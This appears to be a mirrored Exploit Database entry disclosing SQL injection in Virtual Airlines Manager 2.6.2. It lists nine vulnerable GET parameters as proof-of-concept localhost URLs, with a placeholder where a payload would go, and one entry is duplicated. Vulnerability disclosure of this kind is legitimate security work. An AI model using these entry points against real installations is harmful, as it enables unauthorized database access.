Virtual Airlines Manager 2.6.2 – ‘airport’ SQL Injection

• Exploit Database
• 131 阅读

• 作者： Kostadin Tonev
  日期： 2020-06-09
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/48567/

• # Exploit Title: Virtual Airlines Manager 2.6.2 - 'airport' SQL Injection
  # Google Dork: N/A
  # Date: 2020-06-08
  # Exploit Author: Kostadin Tonev
  # Vendor Homepage: http://virtualairlinesmanager.net
  # Software Link: https://virtualairlinesmanager.net/index.php/vam-releases/
  # Version: 2.6.2
  # Tested on: Linux Mint
  # CVE : N/A
  
  . . .. . . . . .+.
  . .: ... :. .___---------___.
   .. ..:.:. _".^ .^ ^.'.. :"-_. .
  .: ...:../:. .^:.:\.
  . . :: +. :.:/: . ... . .:\
   .:. . _ :::/: .^ .. .:\
  .. . . . - : :.:./...:\
  .. . :..|:..^. .:|
  . . : : ..||.. . !:|
  . . . . ::. ::\( . :)/
   . . : . : .:.|. ######.#######::|
  :.. .:-: .:::|.####### ..########:|
   ........ :\ ########:######## :/
  ..+ :: : -.:\ ######## . ########.:/
  ..+ . . . . :.:\. ####### #######..:/
  :: . . . . ::.:..:.\ . . ..:/
   . . ... :-::::.\. | | . .:/
  .:...-:.":.::.\ ..:/
   .-. . . . .: .:::.:.\. .:/
  . . .:: ....::_:..:\ ___.:/
   . .. .:. .. ..: :.:.:\ :/
   + . . : . ::. :.:. .:.|\.:/|
   . + .....:: ..|--.:|
  .. . . ... ... :..:.."(..)"
   . . .:. .: ::/..::\
  
  
  
  [1] Vulnerable GET parameter: notam_id=[SQLi]
  [PoC] http://localhost/vam/index.php?page=notam&notam_id=[SQLi]
  
  [2] Vulnerable GET parameter: airport=[SQLi]
  [PoC] http://localhost/vam/index.php?page=airport_info&airport=[SQLi]
  
  [3] Vulnerable GET parameter: registry_id=[SQLi]
  [PoC] http://localhost/vam/index.php?page=plane_info_public&registry_id=[SQLi]
  
  [4] Vulnerable GET parameter: plane_location=[SQLi]
  [PoC] http://localhost/vam/index.php?page=fleet_public&plane_location=[SQLi]
  
  [5] Vulnerable GET parameter: hub_id=[SQLi]
  [PoC] http://localhost/vam/index.php?page=hub&hub_id=[SQLi]
  
  [6] Vulnerable GET parameter: pilot_id=[SQLi]
  [PoC] http://localhost/vam/index.php?page=pilot_details&pilot_id=[SQLi]
  
  [7] Vulnerable GET parameter: registry_id=[SQLi]
  [PoC] http://localhost/vam/index.php?page=plane_info_public&registry_id=[SQLi]
  
  [8] Vulnerable GET parameter: event_id=[SQLi]
  [PoC] http://localhost/vam/index.php?page=event&event_id=[SQLi]
  
  [9] Vulnerable GET parameter: tour_id=[SQLi]
  [PoC] http://localhost/vam/index.php?page=tour_detail&tour_id=[SQLi]
  

  Python

  Copy